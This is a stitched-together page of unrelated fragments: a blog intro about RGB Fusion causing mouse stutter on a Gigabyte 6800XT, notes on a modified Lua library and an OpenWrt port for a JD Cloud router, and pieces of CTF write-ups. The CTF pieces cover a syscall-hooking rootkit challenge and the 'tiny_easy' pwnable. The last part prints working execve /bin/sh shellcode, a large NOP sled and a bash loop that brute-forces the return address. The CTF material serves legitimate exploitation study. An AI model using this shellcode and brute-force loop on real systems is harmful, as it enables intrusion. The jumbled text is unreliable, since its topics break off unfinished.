Modding a fix for the mouse stutter caused by RGB Fusion on a Gigabyte 超级雕 (AORUS) card
Preface
For study and research only.
Last week I picked up a Gigabyte 超级雕 6800XT on the second-hand market, planning to use it for a Hackintosh build.
The system is Windows 11. After the card arrived I installed the graphics driver and Gigabyte's RGB control software, RGB Fusion 2.0 (B22.0414.1, the latest version on the official site). The small display looks nice, but mouse movement always felt slightly stuttery; it is most noticeable when drawing continuous circles with the mouse (my eyes are fairly sensitive to it).
It stutters roughly once per second. As shown in the images below, the first image is normal, while in the second the cursor jumps too far between the first and second mouse positions, which is the stutter:
A Lua script a.lua on a MIPS-architecture router had been compiled into the luac binary format. Preliminary analysis showed that the luac file runs when lua is pointed at the shared library liblua.so.5.1.5 from the firmware, whereas official OpenWrt for the same architecture cannot run it, so I concluded that liblua.so.5.1.5 had been modified.
A few days ago I bought a JD Cloud 无线宝 Luban router on JD.com; its hardware configuration is as follows:
CPU: MT7621A
I had been leaving it running every day to earn JD Beans, but the official firmware is really hard to live with, so let's port OpenWrt to it.
First, ssh in and take a look.
elf.py:
...
There are 25 chances; each time you can read 32 bytes of the process address space…
Now let's look at gen.py.
rootkit is another challenge about kernel exploits, following syscall.
After connecting to the host, I found that the kernel loads the rootkit module at boot:
[ 3.337631] rootkit: module license 'unspecified' taints kernel.
Then I used IDA to disassemble rootkit.ko.
The module disables write protection and replaces original syscalls such as sys_open with sys_open_hooked by writing to the syscall table (0xc15fa020).
The sys_open_hooked syscall checks whether the filename string contains the substring flag. If it does not, the original sys_open is called. If it does, the call returns an fd of -1, so opening the file fails.
Of course, other syscalls such as sys_symlink fail as well:
/tmp # ln -s ../flag ./
0x01
{
{
$ checksec tiny_easy
NX disabled.
08048054 pop eax
…?
What a tiny ELF...
(gdb) b *0x08048056
Obviously, tiny_easy moves '/hom' into edx and then calls edx, which makes the program jump to address 0x6d6f682f (/hom) and triggers a segmentation fault.
$ exec --help
The exec command with the -a argument lets us pass a specified argv[0] to COMMAND. That means we can put shellcode into an environment variable, pass a guessed shellcode address as argv[0], and get a shell by brute force.
But the problem is, how to make a shellcode?
I guess we need pwntools…
$ python3
And the shellcode address:
$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")')
Ok, use 0xffaabda0 as argv[0].
Before doing the brute force, we should pad the shellcode with NOPs (\x90) to improve the success rate of call edx.
export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done